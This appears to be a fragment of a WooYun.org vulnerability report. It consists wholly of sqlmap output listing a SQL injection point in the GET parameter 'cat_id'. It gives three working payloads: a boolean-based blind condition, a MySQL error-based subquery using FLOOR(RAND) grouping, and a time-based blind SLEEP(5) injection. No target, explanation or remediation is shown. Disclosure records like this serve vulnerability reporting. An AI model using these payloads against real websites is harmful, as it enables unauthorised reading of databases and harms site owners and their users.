WooYun.org

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cat_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat_id=31 AND 6747=6747
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: cat_id=31 AND (SELECT 8281 FROM(SELECT COUNT(*),CONCAT(0x7171766a71,(SELECT (ELT(8281=8281,1))),0x71766a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: cat_id=31 AND (SELECT * FROM (SELECT(SLEEP(5)))mjlU)
---